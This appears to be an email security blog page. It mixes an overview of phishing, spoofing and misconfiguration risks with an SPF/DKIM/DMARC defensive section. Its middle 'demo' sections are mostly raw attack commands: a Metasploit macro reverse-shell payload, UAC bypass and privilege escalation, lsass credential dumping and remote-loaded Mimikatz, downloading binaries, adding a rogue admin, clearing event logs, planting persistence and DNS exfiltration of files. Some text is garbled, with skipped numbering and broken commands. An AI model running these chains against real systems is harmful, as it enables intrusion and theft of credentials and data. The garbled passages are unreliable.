Email Security (Exploits, Vulnerabilities and Mitigation)
Email Security Risks in 2022
Over 60% of attacks are via Email using File-less techniques such as (LOLBAS, Phishing, drive-by-downloads, credential theft/account takeovers.)
If it hits your disks its too late.
1- Spoofing and Phishing
E-mail spoofing happens when a cybercriminal sends an e-mail to a user masquerading as someone the user knows. E-mail spoofing to the original sender is easy to accomplish and extremely difficult to trace.
Phishing is another hazardous method used to mislead customers into giving cybercriminals personal data like bank accounts or social security numbers. Cybercriminals sometimes add pictures and trademarks that seem more genuine and authentic. They even create a connection that appears natural. It leads users to a fake website, though. As spoofing and phishing are two of cybercriminals’ most common attack techniques, customers need to be informed of the accessible anti-phishing solution.
2- Vulnerabilities in E-mail Security
Vulnerabilities in e-mail services induced by provider misconfigurations need to be identified. When exploiting e-mail service vulnerabilities, they penetrate the target system, expose information, and make the system inaccessible.
3- Domain’s squatting
Squatting is the registration, sale, or use of a domain name to profit from another party’s brand. As a consequence, companies and their customers may become targets for domain squatting and targeted spear phishing.
The channels of attacks against Internet users are increasing every day. A single link with malicious information may capture a computer. The safety of the components of the e-mail service must be enhanced, and anti-phishing measures such as team member training and simulation of e-mail threats must be introduced.
If harmful information is received from the user via an e-mail attachment, he may take over the whole computer system and network. These files must be examined using an anti-virus and behavioral analysis program based on signatures to guarantee an efficient solution against phishing.
A ransom must be paid once infected to unlock all encrypted data. In this respect, the e-mail service must be strengthened, and the analytical services must be expected to detect and avoid ranking-specific behaviors.
7- Configuration Errors
This is a pervasive security problem. A poorly configured e-mail service may lead to a big issue by enabling e-mail to be delivered without authentication.
For example, a cybercriminal without authentication access to your e-mail service may send a random e-mail to one of your employees. A cybercriminal who embodies the CEO may be more likely to succeed.
8- Browser Exploit Kit
E-mails with known vulnerabilities in the internet browser may lead to identity theft, data leakage, and access problems. Sometimes a link may include an exploited piece of code. In this situation, protection steps must be taken by the e-mail service and security components.
9- Spear Phishing attacks and Business E-mail Compromise (BEC)
Another crucial problem is that a cyber thief who circumvents all security measures uses the ignorance of the end-user to attack the system. Because 97% of the world’s population cannot recognize a sophisticated phishing e-mail. Users should be regularly informed about hazards via phishing tests, exams, surveys, and games.
10-File Format Exploits
Furthermore, file format vulnerabilities have become an essential source of information security threats for an increasing number of companies. Attackers that exploit these vulnerabilities create malicious files that cause application problems (such as buffer overflows). These vulnerabilities are critical since they frequently impact multiple systems. For example, an attacker may create a single malicious PDF file that infects Windows, Macintosh, and Linux systems via a vulnerability in Adobe Acrobat file format.
- There was a massive increase in Ransomeware and CryptoLockers exactly at the same time that allot of companies moved from On-premise Exchange to Office 365, most On-premise Exchange servers were very mature in terms of security, implemented SEGs with mature technology, but allot of Companies moved to Office 365 without evaluating the need for Email Security and implement the built-in security option for Office 365 by Microsoft. This was a mistake and allot of email compromises were able to bypass builtin Office 365 Email security as Microsoft was not mature in that space.
- Attack Examples
- Attack Types
- Attack Glossary
Phishing Email Attached Demo – Fileless Attack using LOLBs and Social Engineering Toolkit – Demo
Here is a demo of creating a Phishing Email Fileless attack using Kali linux, Metaspolit, Social Engineering Tools kit and LOLBs techniques (Creates Macro attacks based on LOLBS powershell bypass cradles).
File-less Word attachment Attack
--------- [UPDATE METASPL0IT] curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erdb > msfinstall && \chmod 755 msfinstall && \ ./msfinstall --------- --------- --------- Unicorn - https://github.com/trustedsec/unicorn git clone https://github.com/trustedsec/unicorn --------- git clone https://github.com/trustedsec/unicorn python unicorn.py windows/meterpreter/reverse_https [kali Ip address] 443 macro sudo msfconsole -r unicorn.rc --------- Copy maro powershell_attack.txt into Word attachment. Open Word / Developer / Macros / Create / Auto_Open / insert payload . https://www.techtoolsforwriters.com/how-to-add-a-macro-to-word/ --------- outlook.exe /PIM "CS2" --------- sessions -i 1 load priv stdapi extapi getuid getsystem background use windows/local/bypassuac_sluihijack set SESSION 1 exploit getuid getsystem --------- execute -H -c -f "C:\\windows\\sysnative\\notepad.exe" migrate 7584 shell --------- whoami ping -m 1 18.104.22.168 net1 group "Domain Admins" /domain bitsadmin /transfer updates /download /priority normal https://urlzs.com/vMceQ C:\Users\Public\1.exe cd C:\Users\Public\ REM - Above command downloads pd64.exe ProcessDump" 1.exe -accepteula -ma lsass.exe lsass.dmp makecab "lsass.dmp" "2.cab" /L "c:\Users\public" ---------
Phishing File-less Attack (Java Rhino) Story
--------- sudo setoolkit 1 2 6 2 no 172.17.0.21 "kali IP" www.1password.com 1 2 7 1 443 1 2 21 y SET Output interact --------- sessions 1 shell whoami systeminfo ping -n 1 misdeppartment.com "FANCY BEAR" ping -n 1 carbon2u.com "FANCY BEAR" ping -n 1 adobeincorp.com "FANCY BEAR" ping -n 1 gorodkoff.com "ZOOMBIE SPIDER" ping west.ics-no.org "PUTTER PANDA" ipconfig /all wmic useraccount get /ALL net user /add Trevor SmshBgr123 net localgroup administrator Trevor /add C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowStyle Hidden -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient.DownloadString(' https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-MimiKatz -DumpCreds" mshta https://secure.eicar.org.eicar.ps1 fsquirt.exe tasklist /svc /FI "ImageName eq lsass*" C:\Windows\system32\rundll32.exe c:\windows\System33\comsvcs.dll, MiniDump <LSASS PID> c:\lsass.dmp full wevtutil cl System wevtutil cl Security wevtutil cl Setup weveutil cl Application exit uoload /home/ect-user/backdoor,exe c:\\windows]\temp shell cd c:\windows]\temp backdoor.exe exit run persistence -U -i 5 -p 443 -r 172.17.0.21 run post/windows/gather/arp_scanner RHOSTS=172.17.0.0/24 --------- background user exploit/windows/local/wmi set RHOSTS 172.17.0.280172.17.0.30 set SESSION 2 set smbUser demo set SMBPass password expolit --------- Example
Living of the Land Exploits
https://lolbas-project.github.io/ https://threathunterplaybook.com/introduction.html https://car.mitre.org/analytics/CAR-2019-04-003/ https://github.com/Arno0x/DNSExfiltrator --------- git clone https://github.com/Arno0x/DNSExfiltrator.git cd DNSExfiltrator pip install -r requiremnets.txt chmod 777 dnsexfiltrator.py sudo ./dnsexfiltrator.py -d www.baconandcheese.com -p Steal1! msfconsole exploit (windows/smb/ms17_010_psexec) > run mkdir C:\\Dell mkdir C:\\Dell\\Drivers mkdir C:\\Dell\\Drivers\\R01161974 upload /root/Desktop/DNSExfiltrator/dnsExfiltrator.js C:\\Dell\\Drivers\\R01161974 upload /root/Desktop/DNSExfiltrator/Invoke-DNSExfiltrator.ps1 C:\\Dell\\Drivers\\R01161974 upload /root/Desktop/DNSExfiltrator/dnsExfiltrator.exe C:\\Dell\\Drivers\\R01161974 upload /root/Desktop/DNSExfiltrator/dnsExfiltrator.dll C:\\Dell\\Drivers\\R01161974 shell cscript.exe dnsExfiltrator.js "C:\Users\demo\Desktop\file.xls" wwww.beachandcheese.com Steal1! load powhershell powershell_execute "Import-Module C:\\Dell\\Drivers\\R01161974\\Invoke-DNSExfiltrator.ps1" powershell_execute "Invoke-DNSExfiltrator -I C:\\Dell\\Drivers\\file.xls -d www.baconandcheese.com -p Steal1!" ---------
Reconnaissance: whoami net shares net users systeminfo findstr /B .C::Domain" net localgroup administrators net view net group "Domain Admins" /domain nltest /domain_trusts powershell.(nslookup -q=txt http://owned.domain.com)[-1] Disabling Firewall CMD : "C:\Windows\system32\netsh.exe" Advfirewall set all profiles state off
- Impossible Travel, SaaS Email can be accessed all over the world, yet a single user account that is accessed by a single human, will follow pattern that is usually from a single location and most likely not from different geolocation at the same time. So detection geolocations for impossible travel its a good option.
- Checking Phishing Mail by (SPF, DKIM, and DMARC).
- Sender Policy Framework (SPF) is an email authentication standard that allows domain owners to specify which servers are authorized to send email with their domain in the “Make From:” email address. SPF allows receiving email systems to query DNS to retrieve the list of authorized servers for a given domain. If an email message arrives via an authorized server, the receiver can consider the email legitimate.
- Domain-based Message Authentication, Reporting & Conformance (DMARC) is an email authentication standard that works as a policy layer for SPF and DKIM to help email receiving systems recognize when an email isn’t coming from a company’s approved domains, and provides instructions to email receiving systems with email on how to safely dispose of unauthorized email.
- Brand Indicators for Message Identification (BIMI) is an email specification that works in conjunction with DMARC to enable companies to have their logos displayed next to their email messages in a recipient’s email client. Not only does this enhance brand visibility in crowded inboxes, it also verifies that the email is legitimate and comes from a trusted source.
- Adding DKIM, SPF, DMARC or BIMI to a single domain is relatively easy and takes just a few moments. But applying them across all the domains in an organization’s entire email ecosystem can get complicated and costly—fast. This is especially true when you’re talking about thousands of domains across numerous divisions and third-party email partners at a large enterprise, so they need to leverage a more comprehensive and automated solution.
- SPF, DKIM, and DMARC are email authentication protocols that are used to help prevent email fraud and protect email users from receiving fraudulent or malicious emails.
- ✔ SPF (Sender Policy Framework) is a protocol that allows an email receiver to verify that incoming mail from a domain is being sent from a server authorized by that domain’s administrators.
- – https://lnkd.in/dPYt32EW
- – https://lnkd.in/dmhVgm3K
- ✔ DKIM (DomainKeys Identified Mail) is another email authentication protocol that allows email receivers to verify that incoming email messages are authentic and have not been altered in transit. DKIM works by adding a digital signature to the email message header that is generated by the sending mail server.
- – https://lnkd.in/dp9SryfH
- – https://lnkd.in/duMSP-FA
- ✔ DMARC (Domain-based Message Authentication, Reporting & Conformance) is a protocol that builds on SPF and DKIM to provide better email authentication and protection against phishing and other email-based attacks. DMARC allows domain owners to specify how their emails should be handled if they fail SPF or DKIM checks.
- – https://lnkd.in/dp9SryfH
- – https://lnkd.in/duMSP-FA
- 🎁 For more Investigation/Analysis Mail Header:
- ✔ TOP FREE Online Checking on Phishing Mail – https://lnkd.in/dxXeDQbj
- ✔ URL shortened Check – https://lnkd.in/d3VS3trE
- ✔ Phishing Email Analysis – https://lnkd.in/dfscKs4n
- ✔ Basic of Mail Analysis/Header – https://lnkd.in/dTBtd99R